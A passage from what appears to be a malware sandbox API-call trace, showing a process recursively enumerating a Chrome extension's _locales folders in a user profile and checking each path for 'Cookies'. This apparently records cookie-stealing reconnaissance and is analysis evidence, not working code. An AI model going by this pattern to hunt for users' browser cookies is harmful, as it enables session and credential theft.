ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.377] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.377] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.377] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.377] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.377] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned 137 [0163.377] lstrlenW (lpString="\\") returned 1 [0163.377] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" [0163.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\" [0163.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\") returned 138 [0163.377] lstrlenW (lpString="messages.json") returned 13 [0163.377] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\" [0163.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" [0163.377] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.377] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.377] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.377] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="sr", cAlternateFileName="")) returned 1 [0163.377] lstrcmpiW (lpString1="sr", lpString2=".") returned 1 [0163.377] lstrcmpiW (lpString1="sr", lpString2="..") returned 1 [0163.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.377] lstrlenW (lpString="\\") returned 1 [0163.378] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.378] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.378] lstrlenW (lpString="sr") returned 2 [0163.378] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" [0163.378] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" [0163.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*.*" [0163.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.378] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.378] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.378] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.378] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.378] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.378] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned 137 [0163.378] lstrlenW (lpString="\\") returned 1 [0163.378] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" [0163.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\" [0163.379] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\") returned 138 [0163.379] lstrlenW (lpString="messages.json") returned 13 [0163.379] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\" [0163.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" [0163.379] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.379] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.379] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.379] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="sv", cAlternateFileName="")) returned 1 [0163.379] lstrcmpiW (lpString1="sv", lpString2=".") returned 1 [0163.379] lstrcmpiW (lpString1="sv", lpString2="..") returned 1 [0163.379] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.379] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.379] lstrlenW (lpString="\\") returned 1 [0163.379] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.379] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.379] lstrlenW (lpString="sv") returned 2 [0163.379] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" [0163.380] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" [0163.380] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*.*" [0163.380] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.380] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.380] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.380] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.380] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.380] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.380] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned 137 [0163.380] lstrlenW (lpString="\\") returned 1 [0163.380] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" [0163.380] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\" [0163.380] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\") returned 138 [0163.380] lstrlenW (lpString="messages.json") returned 13 [0163.380] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\" [0163.380] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned="C:\\Users\\5p5NrGJn0jS 